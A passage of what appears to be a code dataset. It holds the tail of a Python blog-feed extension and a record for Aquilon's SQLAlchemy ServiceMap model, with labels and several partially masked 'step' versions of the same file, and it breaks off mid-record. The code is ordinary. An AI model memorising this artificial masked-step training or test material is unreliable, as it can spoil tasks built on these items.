_\n\n\nclass BlogPost(object):\n\n def __init__(self, **kwargs):\n self.date = kwargs['date']\n self.source_file = kwargs['source_file']\n self.summary = smartypants.smartypants(kwargs['summary'])\n self.title = smartypants.smartypants(kwargs['title'])\n self.route = kwargs['route']\n self.url = kwargs['url']\n # Having the posts enables a blog post to find its relationships.\n self._posts = kwargs['posts']\n\n def __eq__(self, other):\n if other is None:\n return False\n return self.__dict__ == other.__dict__\n\n def __lt__(self, other):\n return self.date < other.date\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return 'BlogPost({}, {})'.format(self.source_file, self.date)\n\n @property\n def next(self):\n \"\"\"Get the next chronological blog post.\"\"\"\n posts_by_date = self.posts_by_date\n index = bisect.bisect_left(posts_by_date, self)\n if index + 1 == len(posts_by_date):\n return None\n return posts_by_date[index + 1]\n\n @property\n def previous(self):\n \"\"\"Get the previous chronological blog post.\"\"\"\n posts_by_date = self.posts_by_date\n index = bisect.bisect_left(posts_by_date, self)\n if index == 0:\n return None\n return posts_by_date[index - 1]\n\n @property\n def posts_by_date(self):\n return sorted(self._posts.values(), key=lambda p: p.date)\n\n\nclass BlogExtension(Extension):\n \"\"\"Track files marked as blog entries and generate a feed.\"\"\"\n\n handle_frontmatter_loaded = True\n handle_pre_composition = True\n handle_post_composition = True\n\n required_metadata = {\n 'author': 'atom_author',\n 'id': 'atom_id',\n 'title': 'atom_title',\n 'url': 'atom_url',\n }\n\n def __init__(self, config):\n super(BlogExtension, self).__init__(config)\n self.posts = {}\n self.atom_metadata = {}\n self.atom_output = ''\n self.list_template = None\n self.list_output = None\n self._resolver = None\n self._should_generate = True\n\n def on_pre_composition(self, director):\n \"\"\"Check that all the required configuration exists.\"\"\"\n if not self._config.parser.has_section('blog'):\n raise AbortError(\n _('A blog section is missing in the configuration file.'))\n\n # Collect atom feed configuration.\n for metadata, option in self.required_metadata.items():\n self._add_atom_metadata(metadata, option)\n self.atom_output = self._get_option('atom_output')\n\n # Collect HTML listing configuration.\n if self._config.parser.has_option('blog', 'list_template'):\n self.list_template = self._get_option('list_template')\n self.list_output = self._get_option('list_output')\n\n # Grab the resolver from the director for determining URLs for posts.\n self._resolver = director.resolver\n\n def on_frontmatter_loaded(self, source_file, frontmatter):\n \"\"\"Record any new blog posts.\"\"\"\n if not self._is_post(frontmatter):\n return\n self._validate_post(source_file, frontmatter)\n post = BlogPost(\n date=frontmatter['date'],\n source_file=source_file,\n summary=frontmatter.get('summary', ''),\n title=frontmatter['title'],\n route=self._resolver.as_route(source_file),\n url=self._resolver.as_url(source_file),\n posts=self.posts,\n )\n frontmatter['post'] = post\n if post != self.posts.get(source_file):\n self.posts[source_file] = post\n self._should_generate = True\n\n def on_post_composition(self, director):\n \"\"\"Generate blog output.\"\"\"\n if not self._should_generate:\n return\n blog_posts = sorted(\n self.posts.values(), key=lambda p: p.date, reverse=True)\n self._generate_atom_feed(director, blog_posts)\n if self.list_template is not None:\n self._generate_list_page(director, blog_posts)\n self._should_generate = False\n\n def _is_post(self, frontmatter):\n \"\"\"Check if the front matter looks like a blog post.\"\"\"\n is_post = frontmatter.get('blog', False)\n if type(is_post) != bool:\n raise AbortError(\n _('Invalid blog frontmatter (expects True or False): '\n '{blog_value}').format(blog_value=is_post))\n return is_post\n\n def _validate_post(self, source_file, frontmatter):\n \"\"\"Validate that the post contains all the required fields.\"\"\"\n required = set([\n 'date',\n 'title',\n ])\n fields = set(frontmatter.keys())\n missing = required - fields\n if missing:\n raise AbortError(_(\n 'The blog post, {filename}, '\n 'is missing required fields: {missing_fields}'.format(\n filename=source_file, missing_fields=', '.join(missing))))\n\n def _generate_atom_feed(self, director, blog_posts):\n \"\"\"Generate the atom feed.\"\"\"\n logger.info(_('Generating Atom XML feed ...'))\n builder = FeedBuilder(self.atom_metadata)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.atom_output)\n builder.write_to(output_file)\n\n def _generate_list_page(self, director, blog_posts):\n \"\"\"Generate the list page.\"\"\"\n logger.info(_('Generating blog list page ...'))\n template = director.catalog.get_template(self.list_template)\n builder = ListPageBuilder(template)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.list_output)\n builder.write_to(output_file)\n\n def _add_atom_metadata(self, name, option):\n \"\"\"Add atom metadata from the config parser.\"\"\"\n self.atom_metadata[name] = self._get_option(option)\n\n def _get_option(self, option):\n \"\"\"Get an option out of the blog section.\"\"\"\n try:\n return self._config.parser.get('blog', option)\n except configparser.NoOptionError:\n raise AbortError(\n _('The blog extension requires the {option} option.').format(\n option=option))\n\n\nclass BlogBuilder(object):\n \"\"\"A template pattern class for generating output related to a blog.\"\"\"\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(\n summary=post.summary,\n title=post.title,\n title_type='html',\n url=post.url,\n updated=post.date,\n ))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(\n u'<li><a href=\"{route}\">{title}</a></li>'.format(\n route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {\n 'blog_list': self._blog_list,\n 'posts': self._posts,\n }\n return self._template.render(context)\n", "step-ids": [ 13, 24, 28, 32, 38 ] }
[ 13, 24, 28, 32, 38 ]
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*- # ex: set expandtab softtabstop=4 shiftwidth=4: # # Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Maps service instances to locations. See class.__doc__ """ from collections import defaultdict from datetime import datetime from sys import maxsize from sqlalchemy import (Column, Integer, Sequence, DateTime, ForeignKey, UniqueConstraint, CheckConstraint) from sqlalchemy.orm import (relation, deferred, backref, defer, undefer, lazyload, contains_eager, object_session) from sqlalchemy.sql import and_, or_, null, case from sqlalchemy.sql.functions import coalesce from aquilon.exceptions_ import InternalError, AquilonError from aquilon.aqdb.model import (Base, Location, Desk, Rack, Room, Bunker, Building, City, Campus, Country, Continent, Hub, Organization, ServiceInstance, Network, Personality, PersonalityServiceListItem, HostEnvironment) _TN = 'service_map' # TODO: We could calculate this map by building a graph of Location subclasses # using Location.valid_parents as edges, and then doing a topological sort # NOTE: The actual values here are unimportant, what matters is their order _LOCATION_PRIORITY = { # Rack and Desk are at the same level Rack: 1000, Desk: 1000, Room: 1100, Bunker: 1200, Building: 1300, City: 1400, Campus: 1500, Country: 1600, Continent: 1700, Hub: 1800, Organization: 1900, } # NOTE: The actual value here is unimportant, what matters is the order wrt. # location-based priorities _NETWORK_PRIORITY = 100 # NOTE: The actual values here are unimportant, only their order matters _TARGET_PERSONALITY = 10 _TARGET_ENVIRONMENT = 100 _TARGET_GLOBAL = 1000 class ServiceMap(Base): """ Service Map: mapping a service_instance to a location. The rows in this table assert that an instance is a valid useable default that clients can choose as their provider during service autoconfiguration. The contained information is actually a triplet: - The service instance to use, - Rules for the scope where the map is valid, - Rules for which objects does the map apply. """ __tablename__ = _TN id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True) service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete='CASCADE'), nullable=False) personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'), nullable=True, index=True) host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True) location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'), nullable=True, index=True) network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'), nullable=True, index=True) creation_date = deferred(Column(DateTime, default=datetime.now, nullable=False)) service_instance = relation(ServiceInstance, innerjoin=True, backref=backref('service_map', cascade="all, delete-orphan", passive_deletes=True)) personality = relation(Personality) host_environment = relation(HostEnvironment) location = relation(Location) network = relation(Network) __table_args__ = (UniqueConstraint(service_instance_id, personality_id, host_environment_id, location_id, network_id, name='%s_uk' % _TN), # At most one of personality_id and host_environment_id # can be not NULL CheckConstraint(case([(personality_id != null(), 1)], else_=0) + case([(host_environment_id != null(), 1)], else_=0) <= 1, name='%s_target_ck' % _TN)) @property def service(self): return self.service_instance.service @property def scope_priority(self): if self.network: return _NETWORK_PRIORITY else: try: return _LOCATION_PRIORITY[type(self.location)] except KeyError: # pragma: no cover raise InternalError("The service map is not prepared to handle " "location class %r" % type(self.location)) @property def object_priority(self): if self.personality: return _TARGET_PERSONALITY elif self.host_environment: return _TARGET_ENVIRONMENT else: return _TARGET_GLOBAL @property def priority(self): return (self.object_priority, self.scope_priority) @property def scope(self): if self.location: return self.location else: return self.network def __init__(self, service_instance, network=None, location=None, personality=None, host_environment=None): if network and location: # pragma: no cover raise AquilonError("A service can't be mapped to a Network and a " "Location at the same time") if network is None and location is None: # pragma: no cover raise AquilonError("A service should by mapped to a Network or a " "Location") if personality and host_environment: # pragma: no cover raise AquilonError("A service can't be mapped to a Personality and " "a HostEnvironment at the same time") super(ServiceMap, self).__init__(service_instance=service_instance, network=network, location=location, personality=personality, host_environment=host_environment) @staticmethod def get_location_mapped_instances(dbservice, dblocation): # Simplified service map lookup - single service, location-based maps # only, no client bindings session = object_session(dbservice) location_ids = [loc.id for loc in dblocation.parents] location_ids.append(dblocation.id) q = session.query(ServiceMap) q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.host_environment_id == null())) q = q.filter(ServiceMap.location_id.in_(location_ids)) q = q.join(ServiceInstance) q = q.filter_by(service=dbservice) q = q.options(contains_eager('service_instance'), defer('service_instance.comments'), lazyload('service_instance.service')) instances = [] min_seen_priority = (maxsize,) # We want the instance(s) with the lowest priority for map in q: si = map.service_instance if min_seen_priority > map.priority: instances = [si] min_seen_priority = map.priority elif min_seen_priority == map.priority: instances.append(si) return instances @staticmethod def get_mapped_instance_cache(dbservices, dbstage, dblocation, dbnetwork=None): """Returns dict of requested services to closest mapped instances.""" session = object_session(dblocation) location_ids = [loc.id for loc in dblocation.parents] location_ids.append(dblocation.id) PSLI = PersonalityServiceListItem q = session.query(ServiceMap) q = q.join(ServiceInstance) q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in dbservices)) q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id, PSLI.service_id == ServiceInstance.service_id)) # Rules for filtering by target object q = q.filter(or_( and_(ServiceMap.personality_id == null(), ServiceMap.host_environment_id == null()), ServiceMap.personality == dbstage.personality, ServiceMap.host_environment_id == coalesce( PSLI.host_environment_id, dbstage.personality.host_environment.id))) # Rules for filtering by location/scope if dbnetwork: q = q.filter(or_(ServiceMap.location_id.in_(location_ids), ServiceMap.network_id == dbnetwork.id)) else: q = q.filter(ServiceMap.location_id.in_(location_ids)) q = q.options(contains_eager('service_instance'), defer('service_instance.comments'), undefer('service_instance._client_count'), lazyload('service_instance.service')) instance_cache = {} instance_priority = defaultdict(lambda: (maxsize,)) # For every service, we want the instance(s) with the lowest priority for map in q: si = map.service_instance service = si.service if instance_priority[service] > map.priority: instance_cache[service] = [si] instance_priority[service] = map.priority elif instance_priority[service] == map.priority: instance_cache[service].append(si) return instance_cache
normal
{ "blob_id": "a9e0659c6a18ffc954079845b7d0de04c46a78c9", "index": 7204, "step-1": "<mask token>\n\n\nclass ServiceMap(Base):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n", "step-2": "<mask token>\n\n\nclass ServiceMap(Base):\n <mask token>\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n", "step-3": "<mask token>\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n", "step-4": "<mask token>\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom sys import maxsize\nfrom sqlalchemy import Column, Integer, Sequence, DateTime, ForeignKey, UniqueConstraint, CheckConstraint\nfrom sqlalchemy.orm import relation, deferred, backref, defer, undefer, lazyload, contains_eager, object_session\nfrom sqlalchemy.sql import and_, or_, null, case\nfrom sqlalchemy.sql.functions import coalesce\nfrom aquilon.exceptions_ import InternalError, AquilonError\nfrom aquilon.aqdb.model import Base, Location, Desk, Rack, Room, Bunker, Building, City, Campus, Country, Continent, Hub, Organization, ServiceInstance, Network, Personality, PersonalityServiceListItem, HostEnvironment\n_TN = 'service_map'\n_LOCATION_PRIORITY = {Rack: 1000, Desk: 1000, Room: 1100, Bunker: 1200,\n Building: 1300, City: 1400, Campus: 1500, Country: 1600, Continent: \n 1700, Hub: 1800, Organization: 1900}\n_NETWORK_PRIORITY = 100\n_TARGET_PERSONALITY = 10\n_TARGET_ENVIRONMENT = 100\n_TARGET_GLOBAL = 1000\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, 